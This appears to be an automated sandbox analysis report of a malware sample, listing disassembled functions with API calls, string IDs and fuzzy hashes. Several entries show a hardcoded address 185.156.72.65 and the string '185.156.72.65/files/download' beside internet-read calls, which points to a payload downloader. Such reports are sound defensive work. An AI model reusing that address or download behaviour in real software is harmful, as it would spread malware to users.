                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,04949E22), ref: 04949EAF
                      • RtlDeleteCriticalSection.NTDLL(0042D064), ref: 04949ECB
                      • CloseHandle.KERNEL32(0042D060,?,?,04949E22), ref: 04949EDB
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                      • String ID:
                      • API String ID: 2565136772-0
                      • Opcode ID: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                      • Instruction ID: 60f2d3ef1866f8ede7c1faaafbd31aa0a08048e47a3ccd64e449fc90f972ba62
                      • Opcode Fuzzy Hash: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                      • Instruction Fuzzy Hash: 6A017571F80711ABE7205BB4FC0DF9B3AECAB88705B504135F905E2161DB74D9078A68
                      Function 04954073 Relevance: 10.8, APIs: 7, Instructions: 329COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: _strrchr
                      • String ID:
                      • API String ID: 3213747228-0
                      • Opcode ID: f7094994ec903abcce49a6c1a655cc9da7e5ebab3a0cb20de3e6a5e810294d9f
                      • Instruction ID: 6d3a3cfc350efa397900819d80e266ca4b6c01479b302033a5c4270e7a4e237d
                      • Opcode Fuzzy Hash: f7094994ec903abcce49a6c1a655cc9da7e5ebab3a0cb20de3e6a5e810294d9f
                      • Instruction Fuzzy Hash: E7B15A72A00365AFEB11CF64CC81BAE7BB9EF95314F244175ED04AF2A1D274B981C7A1
                      Function 00413E0C Relevance: 10.8, APIs: 7, Instructions: 329COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: _strrchr
                      • String ID:
                      • API String ID: 3213747228-0
                      • Opcode ID: 1d05eccc710d275396565a7ca4ce4cb03c32f9e64a227524f8538adb25869953
                      • Instruction ID: 59a992c9e9a8f6180de132557df0e6155a9c37934bf91f888a5cd2673cffff64
                      • Opcode Fuzzy Hash: 1d05eccc710d275396565a7ca4ce4cb03c32f9e64a227524f8538adb25869953
                      • Instruction Fuzzy Hash: 11B14572900355AFDB118E25CC81BEFBFA5EF99310F144167E904AB382D3789982C7A9
                      Function 00401600 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 162COMMON
                      Download Yara Rule
                      APIs
                      • std::_Xinvalid_argument.LIBCPMT ref: 00401605
                        • Part of subcall function 00409882: std::invalid_argument::invalid_argument.LIBCONCRT ref: 0040988E
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,00000000,?,?,185.156.72.65,?,?,?,185.156.72.65,185.156.72.65), ref: 0040163B
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,?,185.156.72.65,?,?,?,185.156.72.65,185.156.72.65), ref: 00401672
                      • Concurrency::cancel_current_task.LIBCPMT ref: 00401787
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ByteCharMultiWide$Concurrency::cancel_current_taskXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                      • String ID: 185.156.72.65$string too long
                      • API String ID: 2123813255-2459586365
                      • Opcode ID: bdd389315b9d1b711b57ef1d46861381343838d65b71c4066379a5609bf0971b
                      • Instruction ID: 7f9c58fd2461fef3fc504d3e16d536ba0f8addf4ce568e9544afc24d4b31befa
                      • Opcode Fuzzy Hash: bdd389315b9d1b711b57ef1d46861381343838d65b71c4066379a5609bf0971b
                      • Instruction Fuzzy Hash: 2E4129B1A00300ABD7149F759C8179BB6F8EF04354F24063AF91AE73D1E7759D0487A9
                      Function 0040B800 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                      Download Yara Rule
                      APIs
                      • _ValidateLocalCookies.LIBCMT ref: 0040B837
                      • ___except_validate_context_record.LIBVCRUNTIME ref: 0040B83F
                      • _ValidateLocalCookies.LIBCMT ref: 0040B8C8
                      • __IsNonwritableInCurrentImage.LIBCMT ref: 0040B8F3
                      • _ValidateLocalCookies.LIBCMT ref: 0040B948
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                      • String ID: csm
                      • API String ID: 1170836740-1018135373
                      • Opcode ID: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                      • Instruction ID: 37170cc5a13740ac021db770265e436928f7f71c6dcd02e9963277d07105fea9
                      • Opcode Fuzzy Hash: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                      • Instruction Fuzzy Hash: 5741A575A00218DBCF10DF69C884A9E7BB5EF44318F14817AE8147B3E2D7399905CBD9
                      Function 00413379 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • FreeLibrary.KERNEL32(00000000,?,00413488,004035B7,?,00000000,?,?,?,00413601,00000022,FlsSetValue,00422950,00422958,?), ref: 0041343A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: FreeLibrary
                      • String ID: api-ms-$ext-ms-
                      • API String ID: 3664257935-537541572
                      • Opcode ID: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                      • Instruction ID: afc4e2dc9a6310a4111bfadf7e5574d8da4adc5d781dab4b07345c405b9fe202
                      • Opcode Fuzzy Hash: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                      • Instruction Fuzzy Hash: 5D210531B01211EBC732DF21EC44ADB7B68AB41765B254132ED05A7391E738EE46C6D8
                      Function 0494BC2B Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • GetLastError.KERNEL32(?,?,0494BC22,0494B1C6,0494A9D7), ref: 0494BC39
                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0494BC47
                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0494BC60
                      • SetLastError.KERNEL32(00000000,0494BC22,0494B1C6,0494A9D7), ref: 0494BCB2
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorLastValue___vcrt_
                      • String ID:
                      • API String ID: 3852720340-0
                      • Opcode ID: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                      • Instruction ID: 8bef0b2f46639e42fdef6b3747fab779de8755c2fad88a4b41a30f1e551f9359
                      • Opcode Fuzzy Hash: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                      • Instruction Fuzzy Hash: D501D8322096119EB7352BFCFCC5E5B2A58EBC567D7214339E524550F1EF51B8016284
                      Function 0040B9C4 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • GetLastError.KERNEL32(?,?,0040B9BB,0040AF5F,0040A770), ref: 0040B9D2
                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040B9E0
                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040B9F9
                      • SetLastError.KERNEL32(00000000,0040B9BB,0040AF5F,0040A770), ref: 0040BA4B
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorLastValue___vcrt_
                      • String ID:
                      • API String ID: 3852720340-0
                      • Opcode ID: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                      • Instruction ID: eb4c4ba290695b81d2d53517126189b774af9dd69cdf091561ca3954f11cb9c7
                      • Opcode Fuzzy Hash: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                      • Instruction Fuzzy Hash: 24019E323196119EE63427B9BCC6A6B3AA5EB05779720023BF120B51E3EF7D480256CC
                      Function 04941867 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 162COMMON
                      Download Yara Rule
                      APIs
                      • std::_Xinvalid_argument.LIBCPMT ref: 0494186C
                        • Part of subcall function 04949AE9: std::invalid_argument::invalid_argument.LIBCONCRT ref: 04949AF5
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,00000000,?,?,185.156.72.65,?,?,?,185.156.72.65,185.156.72.65), ref: 049418A2
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,?,185.156.72.65,?,?,?,185.156.72.65,185.156.72.65), ref: 049418D9
                      • Concurrency::cancel_current_task.LIBCPMT ref: 049419EE
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ByteCharMultiWide$Concurrency::cancel_current_taskXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                      • String ID: 185.156.72.65
                      • API String ID: 2123813255-1765470537
                      • Opcode ID: 69ccd53acc2a7afa4ebe84e379714041f14f87e59b53a70bcc90546bd568d79b
                      • Instruction ID: d785850e2d3667b4c444f598f40c96018d7a3833132ec7e9d6bddf6031acaaf2
                      • Opcode Fuzzy Hash: 69ccd53acc2a7afa4ebe84e379714041f14f87e59b53a70bcc90546bd568d79b
                      • Instruction Fuzzy Hash: A641C8B1A00305ABE7149FB4DC86F5AB6F8EFC9354F100639E95AD7280E771B944C7A1
                      Function 004105C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BBD3FB9F,?,?,00000000,0041DAAB,000000FF,?,0041059C,?,?,00410570,00000016), ref: 004105F5
                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00410607
                      • FreeLibrary.KERNEL32(00000000,?,00000000,0041DAAB,000000FF,?,0041059C,?,?,00410570,00000016), ref: 00410629
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressFreeHandleLibraryModuleProc
                      • String ID: CorExitProcess$mscoree.dll
                      • API String ID: 4061214504-1276376045
                      • Opcode ID: 4cd190c7c455c60d919dcec500e21cbf2ecb46ce251512cda49bfcc6e71cbce3
                      • Instruction ID: ae467a28d40358befcebc9227983d24377640bf1eed1e12363a062fa79a5df9f
                      • Opcode Fuzzy Hash: 4cd190c7c455c60d919dcec500e21cbf2ecb46ce251512cda49bfcc6e71cbce3
                      • Instruction Fuzzy Hash: E701D631A54625EFDB118F80DC05BEEBBB8FB48B10F004536F811A22A0DBB8AC44CB5C
                      Function 00415050 Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                      Download Yara Rule
                      APIs
                      • __alloca_probe_16.LIBCMT ref: 004150D5
                      • __alloca_probe_16.LIBCMT ref: 0041519E
                      • __freea.LIBCMT ref: 00415205
                        • Part of subcall function 00413CB9: RtlAllocateHeap.NTDLL(00000000,?,5(@,?,0040AD5B,?,5(@,185.156.72.65,?,?,004035B7,?,?,5(@), ref: 00413CEB
                      • __freea.LIBCMT ref: 00415218
                      • __freea.LIBCMT ref: 00415225
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: __freea$__alloca_probe_16$AllocateHeap
                      • String ID:
                      • API String ID: 1423051803-0
                      • Opcode ID: c6d75d848bc7a9be22250e28ca9a699f36b8dee5fa0a29534bade35fe4989d48
                      • Instruction ID: 0a96ed905c827a5c292ca8e68d33c0be9e05a90d5fda14ab984eef2cdbaa63a4
                      • Opcode Fuzzy Hash: c6d75d848bc7a9be22250e28ca9a699f36b8dee5fa0a29534bade35fe4989d48
                      • Instruction Fuzzy Hash: AA51C372600606EFDB215FA1EC81EFB77A9EFC5714B15046EFD04D6251EB39CC908AA8
                      Function 04942CB7 Relevance: 7.6, APIs: 5, Instructions: 113memorywindowCOMMON
                      Download Yara Rule
                      APIs
                      • VirtualProtect.KERNEL32(?,?,?,?), ref: 04942D5F
                      • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 04942D74
                      • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 04942D82
                      • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 04942D9D
                      • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 04942DBC
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocDebugErrorFormatLastLocalMessageOutputProtectStringVirtual
                      • String ID:
                      • API String ID: 2509773233-0
                      • Opcode ID: 135e4059f0a8e16b6c40cfe3354c74ba5c0e8907b24caca148f615c37fe0627b
                      • Instruction ID: 175afa162c95cfeadb4e2da24863592be78a5309dce3feafc95c42142ec1e7ff
                      • Opcode Fuzzy Hash: 135e4059f0a8e16b6c40cfe3354c74ba5c0e8907b24caca148f615c37fe0627b
                      • Instruction Fuzzy Hash: D9310532B00004AFDB149F68DC40FAAB7A8FF88305F1541F9F905DB291DB31A906CB94
                      Function 04941597 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 04949F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949F37
                        • Part of subcall function 04949F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F74
                      • __Init_thread_footer.LIBCMT ref: 04941622
                        • Part of subcall function 04949EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949EEC
                        • Part of subcall function 04949EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: 185.156.72.65/files/download$BAOJ$JAY@
                      • API String ID: 4132704954-3011832937
                      • Opcode ID: 6a6592139864edd19948d288d5ea32045136f2484dc71c592f5547b1ee2d657f
                      • Instruction ID: 7258e5586a0b6b714f836cbf843b993ade46c735d2d5c04f1d01758bfd09cb40
                      • Opcode Fuzzy Hash: 6a6592139864edd19948d288d5ea32045136f2484dc71c592f5547b1ee2d657f
                      • Instruction Fuzzy Hash: 47217C70F003448AE730DF79E80ABA6B3A0FF95308FA44279D8485B261DBB565C6CB19
                      Function 00401330 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 004013BB
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: 185.156.72.65/files/download$BAOJ$JAY@
                      • API String ID: 2296764815-3011832937
                      • Opcode ID: 8afcb876ddc2999c1ba0bad2701e5863db79a9b1fdbf3493768d7342b1c45fce
                      • Instruction ID: cf4989964709d5cf6b10aa031a618c24b72f45a9210e311b945b03c0b8b43901
                      • Opcode Fuzzy Hash: 8afcb876ddc2999c1ba0bad2701e5863db79a9b1fdbf3493768d7342b1c45fce
                      • Instruction Fuzzy Hash: E5217170F002848AD730DF39E8467AAB7A0FB15304F90423AE8456B2B2DBB81981CB0D
                      Function 0040CAD7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0040CA88,00000000,?,0042D0F8,?,?,?,0040CC2B,00000004,InitializeCriticalSectionEx,00420B18,InitializeCriticalSectionEx), ref: 0040CAE4
                      • GetLastError.KERNEL32(?,0040CA88,00000000,?,0042D0F8,?,?,?,0040CC2B,00000004,InitializeCriticalSectionEx,00420B18,InitializeCriticalSectionEx,00000000,?,0040C876), ref: 0040CAEE
                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0040CB16
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: LibraryLoad$ErrorLast
                      • String ID: api-ms-
                      • API String ID: 3177248105-2084034818
                      • Opcode ID: 6ea35a358fe08483aaca9864d5c7ce1afea2c26e9c9286d7bdd8822d2b58ffa3
                      • Instruction ID: 25d742bb915314b1e6f169ce4c8bc34e4efbfc99aed270fc8c56fe9432a01067
                      • Opcode Fuzzy Hash: 6ea35a358fe08483aaca9864d5c7ce1afea2c26e9c9286d7bdd8822d2b58ffa3
                      • Instruction Fuzzy Hash: 1BE0ED30740208F6DA201B61FD4AB5A3E69AB51B84F508131FD09A81E2E675A8159548
                      Function 04959933 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • GetConsoleOutputCP.KERNEL32(0042C014,00000000,00000000,00000000), ref: 04959996
                        • Part of subcall function 049551FF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04955462,?,00000000,-00000008), ref: 04955260
                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 04959BE8
                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 04959C2E
                      • GetLastError.KERNEL32 ref: 04959CD1
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                      • String ID:
                      • API String ID: 2112829910-0
                      • Opcode ID: c5b85f2605b1a4877e753edebb94315cfcd19b1be6e7f59515690ef87a323643
                      • Instruction ID: ac4ae00053e98a5e680b4bc9fec160e7e4d4493f6071aace53cde3eeb8c891ce
                      • Opcode Fuzzy Hash: c5b85f2605b1a4877e753edebb94315cfcd19b1be6e7f59515690ef87a323643
                      • Instruction Fuzzy Hash: FED15DB5E00248DFDB15CFA8D8809EDBBF5FF49314F24456AE85AEB261D630A941CB50
                      Function 004196CC Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • GetConsoleOutputCP.KERNEL32(BBD3FB9F,00000000,00000000,00000000), ref: 0041972F
                        • Part of subcall function 00414F98: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151FB,?,00000000,-00000008), ref: 00414FF9
                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00419981
                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 004199C7
                      • GetLastError.KERNEL32 ref: 00419A6A
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                      • String ID:
                      • API String ID: 2112829910-0
                      • Opcode ID: d5159c83dd231617a998158a8310f21f7752f689ca9b76bea25e341def0ffdac
                      • Instruction ID: 69433146677377e8d20fe438975eb5a03bdcbd81a3ae5f82b6e9dde0de1db5be
                      • Opcode Fuzzy Hash: d5159c83dd231617a998158a8310f21f7752f689ca9b76bea25e341def0ffdac
                      • Instruction Fuzzy Hash: 55D18EB5E002489FCF15CFA8C8909EEBBB5FF49304F28416AE456EB351D634AD86CB54
                      Function 04941BD7 Relevance: 6.3, APIs: 4, Instructions: 293networkfileCOMMON
                      Download Yara Rule
                      APIs
                      • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 04941C6C
                      • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 04941C8F
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: FileInternet$PointerRead
                      • String ID:
                      • API String ID: 3197321146-0
                      • Opcode ID: 2d5a771e8380d636b867b6a84e5d92fd6be66219798d598553b184485cedc64d
                      • Instruction ID: 4dca8ee12fc941249610a2b83ebfa9bb9639dbb1437fa16a71cb8a2fad8c4bfb
                      • Opcode Fuzzy Hash: 2d5a771e8380d636b867b6a84e5d92fd6be66219798d598553b184485cedc64d
                      • Instruction Fuzzy Hash: F3C139B09002199FEB24DF64CC89FE9B7B8FF89304F1041E9E509A7290D775AA85CF95
                      Function 0494BD0B Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AdjustPointer
                      • String ID:
                      • API String ID: 1740715915-0
                      • Opcode ID: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
                      • Instruction ID: bdde06f235a269d078468b2cf144f212e7cf328a5c8ff44ed6905d2f0b42bfa6
                      • Opcode Fuzzy Hash: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
                      • Instruction Fuzzy Hash: 8251D3B2605606AFEB298F10D888FBB73A9EFC4314F14497DDA054B690E731FA50DB90
                      Function 0040BAA4 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AdjustPointer
                      • String ID:
                      • API String ID: 1740715915-0
                      • Opcode ID: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
                      • Instruction ID: 427e8739ad2fdfd1bc337791267323dcfa727258f99cd262dc66f5b8a014dc51
                      • Opcode Fuzzy Hash: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
                      • Instruction Fuzzy Hash: 8551BC72600206AFDB299F15C881B6AB7B4EF40314F14453FE80267AD9E739AC91DBDD
                      Function 0495774B Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 049551FF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04955462,?,00000000,-00000008), ref: 04955260
                      • GetLastError.KERNEL32 ref: 049577AF
                      • __dosmaperr.LIBCMT ref: 049577B6
                      • GetLastError.KERNEL32(?,?,?,?), ref: 049577F0
                      • __dosmaperr.LIBCMT ref: 049577F7
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                      • String ID:
                      • API String ID: 1913693674-0
                      • Opcode ID: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                      • Instruction ID: ff8533bfb572cb16cd7e42a707f9002909eb208d62e8c759a9d0a38b944d5ae3
                      • Opcode Fuzzy Hash: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                      • Instruction Fuzzy Hash: 87218675600615AFEB11EFA1D880D6A77ADFF84268B208579ED1997260D731FD00C760
                      Function 004174E4 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00414F98: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151FB,?,00000000,-00000008), ref: 00414FF9
                      • GetLastError.KERNEL32 ref: 00417548
                      • __dosmaperr.LIBCMT ref: 0041754F
                      • GetLastError.KERNEL32(?,?,?,?), ref: 00417589
                      • __dosmaperr.LIBCMT ref: 00417590
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                      • String ID:
                      • API String ID: 1913693674-0
                      • Opcode ID: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                      • Instruction ID: 13998406a9580c806f698d28beb46a1cfe6368519752a94925d3c074931ab18b
                      • Opcode Fuzzy Hash: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                      • Instruction Fuzzy Hash: 0921C871608205BFDB20AF62C840CABB7BAFF44368710853BF92997651D739ED818768
                      Function 04951482 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
